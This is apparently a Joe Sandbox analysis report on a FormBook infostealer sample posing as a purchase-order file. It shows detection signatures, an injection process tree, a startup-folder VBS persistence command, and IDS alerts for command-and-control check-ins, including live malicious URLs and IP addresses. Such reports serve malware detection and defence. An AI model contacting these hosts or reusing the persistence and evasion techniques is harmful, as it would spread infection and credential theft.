Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
P.Order request for quotations.exe

Overview

General Information

Sample name:P.Order request for quotations.exe
Analysis ID:1634999
MD5:97184d87ca001b04d2bde0ee754f3fb1
SHA1:45189e8fd1f403d8d5f901d78c27c2aaaaa247f5
SHA256:b907a6a075b32404a73555236511926abfcdc49adb1f83033ada0b6cde886b83
Tags:exeFormbookuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Downloads files with wrong headers with respect to MIME Content-Type
Drops VBS files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • P.Order request for quotations.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\P.Order request for quotations.exe" MD5: 97184D87CA001B04D2BDE0EE754F3FB1)
    • P.Order request for quotations.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\P.Order request for quotations.exe" MD5: 97184D87CA001B04D2BDE0EE754F3FB1)
      • Q1o6bM9jrUC5ov0.exe (PID: 5728 cmdline: "C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\oS5uO5pk.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • finger.exe (PID: 6960 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • firefox.exe (PID: 6116 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wscript.exe (PID: 3612 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • HashSize.exe (PID: 660 cmdline: "C:\Users\user\AppData\Roaming\HashSize.exe" MD5: 97184D87CA001B04D2BDE0EE754F3FB1)
      • HashSize.exe (PID: 6884 cmdline: "C:\Users\user\AppData\Roaming\HashSize.exe" MD5: 97184D87CA001B04D2BDE0EE754F3FB1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3358405901.0000000000310000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.3366174794.00000000063C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.1048159785.0000000005F80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000002.00000002.1160607644.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.3359171063.0000000002800000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.P.Order request for quotations.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.P.Order request for quotations.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                7.2.HashSize.exe.38a0a04.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.P.Order request for quotations.exe.5f80000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    7.2.HashSize.exe.38a0a04.3.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 4 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , ProcessId: 3612, ProcessName: wscript.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , ProcessId: 3612, ProcessName: wscript.exe

                      Data Obfuscation

                      barindex
                      Sigma detected: Drops script at startup location
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\P.Order request for quotations.exe, ProcessId: 7152, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-11T09:10:28.584335+010028554651A Network Trojan was detected192.168.2.856928172.67.138.5580TCP
                      2025-03-11T09:10:52.354907+010028554651A Network Trojan was detected192.168.2.85693443.251.56.7880TCP
                      2025-03-11T09:11:14.512584+010028554651A Network Trojan was detected192.168.2.85693813.248.169.4880TCP
                      2025-03-11T09:11:27.694244+010028554651A Network Trojan was detected192.168.2.85694213.248.169.4880TCP
                      2025-03-11T09:11:57.978643+010028554651A Network Trojan was detected192.168.2.85694613.248.169.4880TCP
                      2025-03-11T09:12:11.243639+010028554651A Network Trojan was detected192.168.2.856950209.74.77.23080TCP
                      2025-03-11T09:12:25.285569+010028554651A Network Trojan was detected192.168.2.856954134.122.135.5480TCP
                      2025-03-11T09:12:38.474132+010028554651A Network Trojan was detected192.168.2.85695813.248.169.4880TCP
                      2025-03-11T09:12:59.688670+010028554651A Network Trojan was detected192.168.2.85696213.248.169.4880TCP
                      2025-03-11T09:13:14.936097+010028554651A Network Trojan was detected192.168.2.856966111.119.219.19580TCP
                      2025-03-11T09:13:28.241464+010028554651A Network Trojan was detected192.168.2.856971172.67.148.16380TCP
                      2025-03-11T09:13:42.223009+010028554651A Network Trojan was detected192.168.2.856976157.112.187.7780TCP
                      2025-03-11T09:13:57.734056+010028554651A Network Trojan was detected192.168.2.8569808.222.228.10780TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-11T09:10:44.448564+010028554641A Network Trojan was detected192.168.2.85693143.251.56.7880TCP
                      2025-03-11T09:10:47.198842+010028554641A Network Trojan was detected192.168.2.85693243.251.56.7880TCP
                      2025-03-11T09:10:49.784624+010028554641A Network Trojan was detected192.168.2.85693343.251.56.7880TCP
                      2025-03-11T09:10:57.855118+010028554641A Network Trojan was detected192.168.2.85693513.248.169.4880TCP
                      2025-03-11T09:11:00.418922+010028554641A Network Trojan was detected192.168.2.85693613.248.169.4880TCP
                      2025-03-11T09:11:02.949484+010028554641A Network Trojan was detected192.168.2.85693713.248.169.4880TCP
                      2025-03-11T09:11:20.025492+010028554641A Network Trojan was detected192.168.2.85693913.248.169.4880TCP
                      2025-03-11T09:11:22.617417+010028554641A Network Trojan was detected192.168.2.85694013.248.169.4880TCP
                      2025-03-11T09:11:25.141654+010028554641A Network Trojan was detected192.168.2.85694113.248.169.4880TCP
                      2025-03-11T09:11:41.276781+010028554641A Network Trojan was detected192.168.2.85694313.248.169.4880TCP
                      2025-03-11T09:11:43.836773+010028554641A Network Trojan was detected192.168.2.85694413.248.169.4880TCP
                      2025-03-11T09:11:46.397538+010028554641A Network Trojan was detected192.168.2.85694513.248.169.4880TCP
                      2025-03-11T09:12:03.662512+010028554641A Network Trojan was detected192.168.2.856947209.74.77.23080TCP
                      2025-03-11T09:12:06.160289+010028554641A Network Trojan was detected192.168.2.856948209.74.77.23080TCP
                      2025-03-11T09:12:08.772331+010028554641A Network Trojan was detected192.168.2.856949209.74.77.23080TCP
                      2025-03-11T09:12:17.628948+010028554641A Network Trojan was detected192.168.2.856951134.122.135.5480TCP
                      2025-03-11T09:12:20.180777+010028554641A Network Trojan was detected192.168.2.856952134.122.135.5480TCP
                      2025-03-11T09:12:22.726704+010028554641A Network Trojan was detected192.168.2.856953134.122.135.5480TCP
                      2025-03-11T09:12:30.789870+010028554641A Network Trojan was detected192.168.2.85695513.248.169.4880TCP
                      2025-03-11T09:12:33.345648+010028554641A Network Trojan was detected192.168.2.85695613.248.169.4880TCP
                      2025-03-11T09:12:35.920906+010028554641A Network Trojan was detected192.168.2.85695713.248.169.4880TCP
                      2025-03-11T09:12:52.044581+010028554641A Network Trojan was detected192.168.2.85695913.248.169.4880TCP
                      2025-03-11T09:12:54.598963+010028554641A Network Trojan was detected192.168.2.85696013.248.169.4880TCP
                      2025-03-11T09:12:57.134326+010028554641A Network Trojan was detected192.168.2.85696113.248.169.4880TCP
                      2025-03-11T09:13:06.652987+010028554641A Network Trojan was detected192.168.2.856963111.119.219.19580TCP
                      2025-03-11T09:13:09.217296+010028554641A Network Trojan was detected192.168.2.856964111.119.219.19580TCP
                      2025-03-11T09:13:11.762374+010028554641A Network Trojan was detected192.168.2.856965111.119.219.19580TCP
                      2025-03-11T09:13:20.609461+010028554641A Network Trojan was detected192.168.2.856967172.67.148.16380TCP
                      2025-03-11T09:13:23.129973+010028554641A Network Trojan was detected192.168.2.856968172.67.148.16380TCP
                      2025-03-11T09:13:25.747974+010028554641A Network Trojan was detected192.168.2.856969172.67.148.16380TCP
                      2025-03-11T09:13:34.591612+010028554641A Network Trojan was detected192.168.2.856973157.112.187.7780TCP
                      2025-03-11T09:13:37.148884+010028554641A Network Trojan was detected192.168.2.856974157.112.187.7780TCP
                      2025-03-11T09:13:39.679771+010028554641A Network Trojan was detected192.168.2.856975157.112.187.7780TCP
                      2025-03-11T09:13:49.287385+010028554641A Network Trojan was detected192.168.2.8569778.222.228.10780TCP
                      2025-03-11T09:13:51.784953+010028554641A Network Trojan was detected192.168.2.8569788.222.228.10780TCP
                      2025-03-11T09:13:54.333184+010028554641A Network Trojan was detected192.168.2.8569798.222.228.10780TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: P.Order request for quotations.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: http://www.blogkart4u.xyz/36cg/?vVgx8nB0=c6lcAlso4cwdWdj8OmW47AtI274xiSR94bq7w+xrmdROEAiOB56qTuKvZNoCgSLBfC/6u7yUdjQUAHkJ36WqigWvF+W/duDuE7nAcq/mnuhXg7Y1Cc7r91JMMuzgajzb2w==&lX=uP8XAvira URL Cloud: Label: malware
                      Source: http://www.2y0uoqwoohvdf5vd.top/qkhv/Avira URL Cloud: Label: malware
                      Source: http://www.warc.tech/hxn2/Avira URL Cloud: Label: malware
                      Source: http://www.quo1ybjmkhdqljoz.top/ynw5/Avira URL Cloud: Label: malware
                      Source: http://www.warc.tech/hxn2/?vVgx8nB0=ZV/imptMlgE5kVt692kkoOOnpYQNqGQCFmm/TGgbqnHG1mgu4lPPJ2KHb3Eys5m88oXnT1AcDhAihVQlrO8FUlJM8pp5ZWnyQzjiEF0o+8f3DTsNGzDCqAFXqps7Otorhw==&lX=uP8XAvira URL Cloud: Label: malware
                      Source: http://www.quo1ybjmkhdqljoz.top/ynw5/?vVgx8nB0=ZF/ThatktxT4IEpwfKsUOyQVHh5nHqomFNyY5ir4FklXSfOpwm6EfqJ4jyoelDA7A+pvc8dOI9DtdfL88IP+1kOCv+QPJBPSYWlpE+7rJT4XimcIjMNVjm2BzIrdTYhFEQ==&lX=uP8XAvira URL Cloud: Label: malware
                      Source: http://www.2y0uoqwoohvdf5vd.top/qkhv/?vVgx8nB0=i51Ixu4M5LOvjs5atst6QhQmAxFvlGpFEg8Yva/DYuN1L4sxQPD0gcYXROip4eIGKLRWO2x5MCzKIlk6eYaz3FYy7ZtcWTJr5uThofgj61z5iUNO0ndKyizlBAbSXj3dvw==&lX=uP8XAvira URL Cloud: Label: malware
                      Source: http://www.blogkart4u.xyz/36cg/Avira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeAvira: detection malicious, Label: HEUR/AGEN.1323672
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeReversingLabs: Detection: 26%
                      Multi AV Scanner detection for submitted file
                      Source: P.Order request for quotations.exeVirustotal: Detection: 36%Perma Link
                      Source: P.Order request for quotations.exeReversingLabs: Detection: 26%
                      Yara detected FormBook
                      Source: Yara matchFile source: 2.2.P.Order request for quotations.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.P.Order request for quotations.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3358405901.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3366174794.00000000063C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1160607644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3359171063.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1187484394.0000000004640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3358967031.00000000025B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3362082192.00000000029A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1170345518.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: P.Order request for quotations.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: P.Order request for quotations.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: finger.pdb source: P.Order request for quotations.exe, 00000002.00000002.1160887135.0000000001218000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: P.Order request for quotations.exe, 00000000.00000002.1048657494.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000039A0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: P.Order request for quotations.exe, 00000002.00000002.1161227472.0000000001740000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3362238359.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3362238359.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1169662969.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1160903868.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: P.Order request for quotations.exe, 00000000.00000002.1048657494.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000039A0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: P.Order request for quotations.exe, P.Order request for quotations.exe, 00000002.00000002.1161227472.0000000001740000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000005.00000002.3362238359.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3362238359.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1169662969.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1160903868.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3360028021.0000000000A3F000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: finger.pdbGCTL source: P.Order request for quotations.exe, 00000002.00000002.1160887135.0000000001218000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0032CB70 FindFirstFileW,FindNextFileW,FindClose,5_2_0032CB70
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 4x nop then jmp 066971A8h0_2_066970E8
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 4x nop then jmp 066971A8h0_2_066970F0
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4x nop then pop edi4_2_063EB738
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4x nop then pop edi4_2_063EAC9F
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4x nop then xor eax, eax4_2_063F0525
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4x nop then pop edi4_2_063EB8DA
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then xor eax, eax5_2_00319E40
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then pop edi5_2_0031E6E6
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then mov ebx, 00000004h5_2_02B904CE

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56932 -> 43.251.56.78:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56937 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56928 -> 172.67.138.55:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56945 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56942 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56946 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56933 -> 43.251.56.78:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56947 -> 209.74.77.230:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56940 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56931 -> 43.251.56.78:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56939 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56944 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56949 -> 209.74.77.230:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56938 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56956 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56950 -> 209.74.77.230:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56959 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56935 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56951 -> 134.122.135.54:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56953 -> 134.122.135.54:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56955 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56934 -> 43.251.56.78:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56958 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56943 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56936 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56957 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56969 -> 172.67.148.163:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56967 -> 172.67.148.163:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56977 -> 8.222.228.107:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56980 -> 8.222.228.107:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56979 -> 8.222.228.107:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56975 -> 157.112.187.77:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56971 -> 172.67.148.163:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56961 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56954 -> 134.122.135.54:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56974 -> 157.112.187.77:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56962 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56963 -> 111.119.219.195:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56965 -> 111.119.219.195:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56964 -> 111.119.219.195:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56978 -> 8.222.228.107:80
